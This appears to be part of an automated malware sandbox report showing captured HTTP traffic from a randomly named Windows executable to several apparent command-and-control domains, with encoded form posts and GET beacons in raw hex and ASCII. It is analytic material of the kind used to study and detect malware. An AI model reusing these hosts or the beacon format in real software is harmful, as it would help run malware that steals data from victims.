                                                                                                                                  Data Ascii: DrelH=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWUg7rRuDlvXBnECbPrN0ZAhBsDm2mHN/FzAIqccb2pNS02M3R5QkEoMD7wuftXog1VrgRe628l0ih9kOyPu8arK3WpujO3RlB//d2clOSZLsCbdo32K4SAEp/A49iIJLbXvweNAw4HjveUf/cc6MFk9JcHUXJDBDnkS+XxAGqZ/VcXD64CUbQuO6+ntMfBFtVISTb1lZSgAnjHhvINVNoA2IXEL7sjFtttPQ6JqByaMzmcFJ7pLAniCuYKGyyIELxgB5JFnu1HQy2iZtJMDpcqqN5qyOOBT+wve4j+z+Y9LmBD9JasaNe9EJD4tm6Kq3y+vLj8Q/kUO4RJ8fJkkf5ycsA+BJ5ZV1lMFDlyV7hDR/rpTi7D/FpcmPT5v3Kv1Jj3+/fa1B2t0Del8uTfUyUfJyy9L9H4uXkTIFr/ZvPD5kUXuV6b7qwfcUR7XiyQMu0Wc7Ck9j35dck0y5wWxiU4enRmuKPFIkyMNdnokzhnElUNmqftkpYcHY+PZRmI12c7ya9qfn0DLzIqlNBOt2zfeQIR44BTw8Cqg387/6rg5vBa9CFoTyshS9YKakc3tr+uNmco4BNfksJxCWY9hmdhBfSiE2abstd64XQ6yUMhq7UQMgaW5glmX42VVRSl96l0XyW025K5xhYQ6HFyoznIjV7Obto4S807xDV/ZFD4r2Y4L5nBy1NOBQlrI7xz9R46uXEJ9vRi0mc92KUJVh+mlIYdmrSkv3lirIBozDlKomxkfhup4dSU7RSNhqx+soJSrV0iActECXRD/EsUsPyhcw8kFKnUrzEoOE2ZaFRhkPcR5BkqMJL0l0BZX20YH+K+9AZdKNkKG9seLkNs1p7p4uvq+pEywUiDDk7F1N36Vr0d3TfypkIVydV1IbDjQmGdzspYz9AizMla7Xg7nbTjWh4sevT+W7XdXGitGrCCkqzjNuSHrewRRB5rIKmn/HzTco2 [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:58:49.733653069 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:49 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  36192.168.2.55323965.21.196.90801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:51.385710001 CEST482OUTGET /y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA== HTTP/1.1
                                                                                                                                  Host: www.030002837.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:58:52.236119032 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:52 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  37192.168.2.5532403.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:57.521073103 CEST750OUTPOST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 5a 43 46 58 4d 6a 73 32 57 51 4e 43 2b 75 44 73 50 65 69 43 48 39 66 59 37 4b 74 77 64 2b 57 53 37 2f 70 2b 32 45 30 6e 4a 6e 77 50 6d 72 36 2b 78 57 59 73 34 69 58 5a 6f 46 71 36 6c 5a 44 6f 57 79 2f 61 56 4f 37 59 6c 66 6e 77 2b 64 4d 4c 75 31 6c 4e 6f 4e 34 46 47 63 4b 31 70 4b 64 66 6c 4c 33 78 4a 4b 4b 30 58 6f 74 32 56 37 76 49 78 75 69 59 4b 49 78 74 5a 65 70 72 75 59 59 37 2b 2b 61 34 2b 78 47 41 73 57 55 56 43 4c 36 53 72 4c 75 68 6d 63 4b 46 66 6d 59 6f 32 49 64 6f 6a 45 72 36 35 78 47 58 7a 51 70 64 2b 79 44 74 58 50 2b 2f 37 56 41 74 62 67 77 3d
                                                                                                                                  Data Ascii: DrelH=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4FGcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmcKFfmYo2IdojEr65xGXzQpd+yDtXP+/7VAtbgw=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  38192.168.2.5532413.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:00.095892906 CEST770OUTPOST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 43 53 69 62 74 2b 33 41 6f 6e 4b 6e 77 50 75 4c 36 37 75 47 59 64 34 69 62 2f 6f 41 4b 36 6c 61 2f 6f 57 7a 50 61 56 5a 76 5a 6d 76 6e 79 72 4e 4d 4e 7a 46 6c 4e 6f 4e 34 46 47 63 50 75 70 4b 56 66 6d 36 48 78 4a 6f 69 72 64 49 74 33 53 37 76 49 37 4f 69 6d 4b 49 78 44 5a 61 68 52 75 61 51 37 2b 36 57 34 35 6c 71 42 6d 57 55 62 64 62 37 33 75 70 72 56 6a 50 69 56 66 58 52 2b 70 75 74 4e 69 79 47 51 6a 54 4f 2f 67 77 46 6c 75 68 4c 61 47 2f 66 57 68 32 51 64 46 33 6d 38 6b 46 66 30 4c 46 74 4d 55 39 7a 44 48 72 49 65 4c 44 61 44
                                                                                                                                  Data Ascii: DrelH=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsCSibt+3AonKnwPuL67uGYd4ib/oAK6la/oWzPaVZvZmvnyrNMNzFlNoN4FGcPupKVfm6HxJoirdIt3S7vI7OimKIxDZahRuaQ7+6W45lqBmWUbdb73uprVjPiVfXR+putNiyGQjTO/gwFluhLaG/fWh2QdF3m8kFf0LFtMU9zDHrIeLDaD


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  39192.168.2.5532423.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:02.726398945 CEST1787OUTPOST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 61 53 2b 34 31 2b 32 6e 63 6e 45 48 77 50 67 72 36 36 75 47 59 36 34 69 54 37 6f 41 47 45 6c 66 7a 6f 45 68 48 61 42 39 44 5a 78 66 6e 79 30 39 4d 49 75 31 6c 45 6f 4e 6f 5a 47 63 2f 75 70 4b 56 66 6d 35 66 78 41 61 4b 72 4f 59 74 32 56 37 76 50 78 75 6a 4c 4b 49 70 31 5a 61 73 75 75 4a 49 37 35 65 36 34 34 57 53 42 75 57 55 5a 65 62 37 56 75 6f 58 4b 6a 4f 4f 5a 66 58 6c 48 70 70 42 4e 67 33 71 47 7a 79 4f 51 36 42 31 37 38 6a 66 36 54 59 54 59 76 31 4d 54 59 55 4f 43 75 32 66 58 63 79 64 4b 63 2b 53 4c 59 4b 59 5a 50 32 6a 4e 45 33 70 6d 71 44 48 2f 71 55 62 2f 73 47 33 68 69 51 5a 6e 62 71 66 72 6c 4c 46 79 72 4a 76 74 52 46 4b 32 56 48 52 75 33 4b 39 38 75 79 54 41 79 6b 44 4a 7a 5a 34 4a 55 46 52 6d 63 50 6a 4f 52 41 42 46 5a 51 76 38 57 41 4a 45 70 6f 56 79 45 79 34 43 64 47 6f 6a 48 71 6b 79 58 42 38 68 4f 31 76 55 31 37 6e 49 4e 66 55 45 43 6c 56 43 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsaS+41+2ncnEHwPgr66uGY64iT7oAGElfzoEhHaB9DZxfny09MIu1lEoNoZGc/upKVfm5fxAaKrOYt2V7vPxujLKIp1ZasuuJI75e644WSBuWUZeb7VuoXKjOOZfXlHppBNg3qGzyOQ6B178jf6TYTYv1MTYUOCu2fXcydKc+SLYKYZP2jNE3pmqDH/qUb/sG3hiQZnbqfrlLFyrJvtRFK2VHRu3K98uyTAykDJzZ4JUFRmcPjORABFZQv8WAJEpoVyEy4CdGojHqkyXB8hO1vU17nINfUEClVCv4DD1NK30NSjny3QY9yasuQpIs1qfCovCXimtlJPhJcjGmg1lonPObRBc1ja0Or8/5rZHiiq7XfShcqzZrqcCtwf8oWCnQP+Aq8K34PKPRYZGjnfxa44tRt7xXes57LSZivBKJQDViN8zObOad5dLK2Fmuu147md/fw5kDS5vQWpfQgQLmqfxFWIOdUDWJ/LIQlioaVTxNcOjNfvJwDnFk4qm7yhH1MvB/18fjcBdjtZ4ZDkqvm3es1ohG7m5IoAyks6M3eEuEdrfungGuTwK2oqz0HBETEkbyQcz7zdIMepELetHgEJlRj23CCy06XqWwT0Rsuuiq+m4dWWPB0736d8L+Z2Lo6qZLZX/WHWuOsNQ0HqxD2KjgwyCCyUzWDpgbcMj3jhqxJ+C8y9knofDttkpPRQbMADlMTOLlyj313jywZ/XxxwbASpfpYHI37FSPNXp11ldPkZbUbAWaNSUTS20W7VGSOjb+H42SgeFgNJpgnfUyxXI0iaQsxjymbshfMARgBZfrSPYbCiDfD7s4W/xo7eAUOiF+/8pztG2tiO7axP311GwVT4auUCsBMdvrrZv4ajiaWA4qq6Jn30C5V1IHdmtDddOovXk0MlPdn0MjZsKPEf1eQV2ZKscd8A2mtli2RV5Wf15vtCvAyoyUkTF5xghYWdOn [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  40192.168.2.5532433.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:05.265094995 CEST483OUTGET /m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:59:05.923753023 CEST403INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:05 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 263
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 72 65 6c 48 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 47 41 32 30 44 66 58 31 32 30 4c 66 43 4f 38 6e 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 41 58 63 6e 32 71 33 44 73 44 6b 4f 76 32 48 63 37 53 71 35 31 4f 48 2b 57 6c 4c 61 4b 4a 43 38 30 4a 50 65 30 4a 51 66 2b 48 5a 6e 76 61 5a 6c 47 75 37 71 76 2f 31 7a 30 62 4c 64 43 71 43 32 52 72 45 30 66 6f 72 56 75 4d 37 42 66 41 3d 3d 26 53 78 3d 67 6e 4d 34 5a 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  41192.168.2.5532443.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:11.008121014 CEST744OUTPOST /12c7/ HTTP/1.1
                                                                                                                                  Host: www.booosted.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.booosted.xyz
                                                                                                                                  Referer: http://www.booosted.xyz/12c7/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 31 71 4d 77 53 75 6a 4b 47 44 76 78 4e 4f 57 4b 72 5a 7a 76 77 46 49 44 35 48 63 39 64 30 70 57 4b 57 37 4a 51 76 79 67 56 61 55 49 6f 72 2f 33 4a 38 54 45 70 51 51 61 78 59 63 6b 61 49 43 73 36 6e 59 72 48 79 4b 44 6c 39 38 57 30 41 71 79 46 66 41 74 41 58 71 4e 76 37 69 42 7a 42 4f 63 63 2b 49 6a 4b 31 6a 6c 51 4a 35 4f 64 78 50 68 64 79 54 68 54 33 6f 47 53 36 76 77 34 31 31 33 32 43 63 74 4c 55 53 47 5a 74 45 46 49 6c 2b 74 35 48 79 61 50 43 70 30 5a 47 78 46 38 37 6b 78 2b 5a 51 48 46 7a 4a 76 71 44 69 77 4d 55 4b 50 54 6a 68 78 6b 6e 57 53 48 30 3d
                                                                                                                                  Data Ascii: DrelH=mmiLmwXyfZXga1qMwSujKGDvxNOWKrZzvwFID5Hc9d0pWKW7JQvygVaUIor/3J8TEpQQaxYckaICs6nYrHyKDl98W0AqyFfAtAXqNv7iBzBOcc+IjK1jlQJ5OdxPhdyThT3oGS6vw41132CctLUSGZtEFIl+t5HyaPCp0ZGxF87kx+ZQHFzJvqDiwMUKPTjhxknWSH0=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  42192.168.2.5532453.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:13.551187038 CEST764OUTPOST /12c7/ HTTP/1.1
                                                                                                                                  Host: www.booosted.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.booosted.xyz
                                                                                                                                  Referer: http://www.booosted.xyz/12c7/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 67 70 52 72 6d 37 49 56 62 79 6a 56 61 55 44 49 72 77 36 70 38 45 45 6f 74 6a 61 77 6b 63 6b 61 4d 43 73 37 33 59 72 77 6d 4c 44 31 39 36 65 55 41 30 78 31 66 41 74 41 58 71 4e 76 2b 35 42 7a 70 4f 63 50 32 49 6c 72 31 73 6f 77 4a 36 4a 64 78 50 6c 64 79 74 68 54 33 77 47 58 62 4b 77 36 39 31 33 30 61 63 71 65 6f 52 4e 5a 74 34 62 34 6b 78 74 70 75 47 51 39 2f 68 77 35 7a 59 65 38 4b 66 30 49 30 36 64 6e 37 68 38 4b 76 61 67 66 63 39 65 6a 43 49 72 48 33 6d 4d 51 6a 39 51 48 71 4a 4a 33 68 58 53 37 4d 43 6a 58 45 70 2b 37 39 32
                                                                                                                                  Data Ascii: DrelH=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9vgpRrm7IVbyjVaUDIrw6p8EEotjawkckaMCs73YrwmLD196eUA0x1fAtAXqNv+5BzpOcP2Ilr1sowJ6JdxPldythT3wGXbKw69130acqeoRNZt4b4kxtpuGQ9/hw5zYe8Kf0I06dn7h8Kvagfc9ejCIrH3mMQj9QHqJJ3hXS7MCjXEp+792


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  43192.168.2.5532463.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:16.103272915 CEST1781OUTPOST /12c7/ HTTP/1.1
                                                                                                                                  Host: www.booosted.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.booosted.xyz
                                                                                                                                  Referer: http://www.booosted.xyz/12c7/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 34 70 57 59 2b 37 4b 32 7a 79 69 56 61 55 41 49 71 33 36 70 38 38 45 6f 31 76 61 77 6f 69 6b 66 51 43 74 5a 76 59 69 6b 4b 4c 4a 31 39 36 53 30 41 31 79 46 66 56 74 41 6e 55 4e 76 4f 35 42 7a 70 4f 63 4f 47 49 6d 36 31 73 75 77 4a 35 4f 64 78 35 68 64 79 57 68 54 76 67 47 58 57 2f 7a 4c 64 31 79 6b 4b 63 6f 73 41 52 45 5a 74 36 61 34 6c 75 74 70 79 5a 51 35 65 59 77 35 32 31 65 2b 71 66 32 4f 42 65 59 30 50 6d 6f 71 37 68 72 59 59 66 46 54 32 31 32 45 48 77 45 48 53 65 59 6e 79 4b 4c 43 70 48 53 62 56 74 78 53 41 34 38 39 49 43 62 41 2b 65 32 34 36 49 30 38 33 32 58 50 44 67 43 74 59 72 69 77 50 31 4e 57 71 74 45 6d 47 61 64 6d 76 47 44 48 2b 67 6c 68 68 49 64 68 6a 46 47 61 45 71 72 45 52 71 4a 7a 61 4b 50 30 30 30 63 6b 71 68 36 53 2f 71 41 32 78 53 55 31 4f 48 30 64 56 6f 73 38 2f 55 64 42 4a 6b 73 39 39 77 74 4f 68 2f 44 33 68 61 37 2b 73 41 69 56 6f 4f [TRUNCATED]
